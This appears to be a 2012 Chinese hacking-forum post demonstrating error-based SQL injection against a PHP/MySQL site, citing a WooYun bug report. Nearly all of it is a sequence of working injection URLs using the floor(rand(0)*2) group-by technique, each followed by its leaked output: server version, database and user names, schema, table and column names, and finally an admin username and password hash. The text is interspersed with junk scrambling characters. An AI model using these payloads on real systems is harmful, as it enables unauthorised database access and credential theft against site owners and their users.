找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1840|回复: 0
打印 上一主题 下一主题

php+mysql高级爆错注入经测算有效

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:52:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
http://www.wooyun.org/bugs/wooyun-2010-016668 L6 t* E. m, K3 ~. f
" T+ Q/ h" L$ e% R1 W
之前想找个测试 没想到这有 可以测试下做个记录而已
9 S1 |& Q/ G% m: ^7 d5 U! I, [1 u* P
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
7 t. ]5 Y8 D% _4 W6 M  q: R) r. O' V' L2 L% v) u
/data0/htdocs/leqi_new/app/myapp.php
  ]# }7 U- ~9 a' k- H- d0 x. E3 r& V: C# Y4 p/ [
或者
& J$ Z$ ~0 O- @7 P2 E8 ]' o
. `8 F8 N3 f0 B# i/**********version()**********/ 5.1.49-log& I9 \/ W7 c! a4 R3 @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0032 y0 s  w$ ^  N; ]
; N( f$ O3 L! \( ?  L1 B
/**********user()**********/  
) h3 K) A; u5 e- @, P8 |, v  {8 fhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 i1 A& m2 U4 G# g: V, [7 j3 l# Z  O0 g! h* N
/**********database()**********/  leqi
% O2 l9 [( L; t3 Lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003! z+ k4 j4 K6 R" g: p* I

: r, a* v4 g- G+ q8 u/**********limit依次递归爆库**********/
) ?4 k7 r' x6 d8 A- D5 uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0030 E( y, N# l) m7 V
information_schema
( i$ e5 E5 A; N3 ahttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
9 w, k' u+ \3 z. E4 Pleqi
: n4 J6 Z! A  h) c1 v. N5 r6 h; \http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003) Y8 P, n8 }0 N
test
) |5 v+ S" x$ @* F! I% {( N8 F4 h: @
/**********limit依次递归爆表名**********/
4 W% K8 C0 Q" w6 n) D+ ehttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
% M* N$ f4 Y4 |0 Busers
3 [; e, f9 m; ?2 b
5 s) G* a+ z8 i- S1 r; f# \$ ~/**********limit依次递归爆字段名**********/. n- k* ?* d" |0 @
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003% M. N% o$ {8 f: ?! m9 @! ^; A
user_id,username,nickname,passwd,group_id/ V, z2 L/ V- t9 c2 y5 }6 H
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23. J, \* _$ x3 v; O* K; m3 M' V; `
/wapc/5000_0005_003
% v, u$ t) ~- L% ~11 21/ Q' p3 s6 i- C- |4 v
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%231 Y4 H( B$ x6 ^2 j( T, l! e6 H' W1 c
/wapc/5000_0005_0035 h7 V( k& T, B
11 341 351 361) @  V$ ?6 d* o2 k8 u: c# ^5 b
/**********爆数据**********/
  ]  A6 t0 C! O. Rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 M6 S6 z; Z- {5 {6 P+ d0 Q! [
admin
6 u5 e7 |& q+ \0 R) H& jhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%235 c7 u" o7 h( a
6a8b4574ca231eb8bd52764d4978ffcd
8 w9 Z# p3 s+ R1 U  n
4 I, D) u- k6 q, a* D, k
& D" Z8 \% D0 t, D( l( i- e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表